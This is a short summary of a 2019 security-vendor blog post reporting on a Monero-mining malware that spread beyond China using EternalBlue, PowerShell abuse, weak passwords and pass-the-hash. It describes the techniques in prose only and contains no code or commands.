Miner Malware Spreads Beyond China, Uses Multiple Propagation Methods Including EternalBlue, Powershell Abuse - TrendLabs Security Intelligence Blog
12 April 2019 6:26 AM GMT
We analyzed a malicious Monero miner using multiple methods for propagation and infection. While initially found infecting systems in China, the malware is expanding to Australia, Taiwan, Vietnam, Hong Kong and India, and with more infiltration techniques like EternalBlue and PowerShell abuse.
- We detected a malware that uses multiple propagation and infection methods to drop a Monero cryptocurrency miner onto as many systems and servers as possible.
- Initially observed in China in early 2019, the methods it previously used to infect networks involved accessing weak passwords and using pass-the-hash technique, Windows admin tools, and brute force attacks with publicly available codes.
- Once a machine is infected via one of the methods, the malware acquires the MAC address and collects information on the anti-virus products installed in the machine.
- It leverages weak passwords in computer systems and databases, targets legacy software that companies may still be using, uses PowerShell-based scripts with components downloaded and executed in memory, exploits unpatched vulnerabilities, and installs using the Windows startup folder and the task scheduler.
- The post Miner Malware Spreads Beyond China, Uses Multiple Propagation Methods Including EternalBlue, Powershell Abuse appeared first on .